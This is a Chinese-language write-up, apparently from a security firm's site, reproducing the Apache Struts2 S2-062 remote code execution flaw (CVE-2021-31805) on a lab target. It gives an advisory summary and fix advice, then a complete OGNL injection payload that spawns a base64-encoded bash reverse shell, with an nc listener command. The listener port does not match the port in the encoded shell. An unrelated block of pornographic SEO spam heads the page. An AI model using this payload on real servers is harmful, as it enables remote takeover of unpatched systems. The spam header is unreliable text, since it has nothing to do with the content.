精品无码久久久久久久久_国产精品一区二区三区四区五区_欧美亚洲国产激情一区二区_午夜精品久久久久久久久久久久_亚洲欧洲中文日韩久久AV乱码_91精品欧美一区二区三区_久久精品一区二区免费播放_日韩高清大片永久免费入口_久久国产欧美日韩精品免费_欧美一区二区三区久久综合_国产精品天天狠天天看

S2-062 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(cve-2021-31805)

2022-05-06點(diǎn)擊量:9708


一、漏洞描述

Apache Struts2是一個(gè)基于MVC設(shè)計(jì)模式的流行的Web應(yīng)用程序框架。

Apache Struts2發(fā)布安全公告(S2-062),修復(fù)了Apache Struts2中的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2021-31805)。

由于對(duì)CVE-2020-17530的修復(fù)不完整,在Apache Struts 2.0.0-2.5.29中,如果開發(fā)人員使用%{...}語法應(yīng)用強(qiáng)制OGNL解析,標(biāo)簽的某些屬性仍然可被二次解析。當(dāng)對(duì)標(biāo)簽屬性中未經(jīng)驗(yàn)證的原始用戶輸入進(jìn)行解析時(shí)可能會(huì)導(dǎo)致遠(yuǎn)程代碼執(zhí)行。

二、影響范圍

Apache Struts 2.0.0-2.5.29

三、修復(fù)建議

目前此漏洞已經(jīng)修復(fù),建議受影響用戶及時(shí)升級(jí)更新到Apache Struts 2.5.30或更高版本。

下載鏈接:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.30

緩解措施:避免對(duì)不受信任或未經(jīng)驗(yàn)證的用戶輸入使用強(qiáng)制OGNL解析。

四、漏洞復(fù)現(xiàn)

復(fù)現(xiàn)環(huán)境:Vulfocus 漏洞威脅分析平臺(tái)?在線靶場(chǎng),這個(gè)靶場(chǎng)還是不錯(cuò)的

1.根據(jù)漏洞提示訪問首頁

2.抓包首頁

3.構(gòu)造payload,變更請(qǐng)求方法為post

name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNTQ1NCAwPiYx}|{base64,-d}|{bash,-i}'}))

4.把反彈shell的命令*base64*編碼處理并且對(duì)其url編碼

5. *base64 加密*

6.URL加密

7. 替換到bp里面

8.準(zhǔn)備一臺(tái)服務(wù)器進(jìn)行監(jiān)聽

nc -vvlp 7777

9.bp點(diǎn)擊發(fā)送反彈shell

到這里整個(gè)漏洞就復(fù)現(xiàn)完成了。


山東云天安全技術(shù)有限公司 版權(quán)所有 魯ICP備17007379號(hào)-1

魯公網(wǎng)安備 37010202002190號(hào)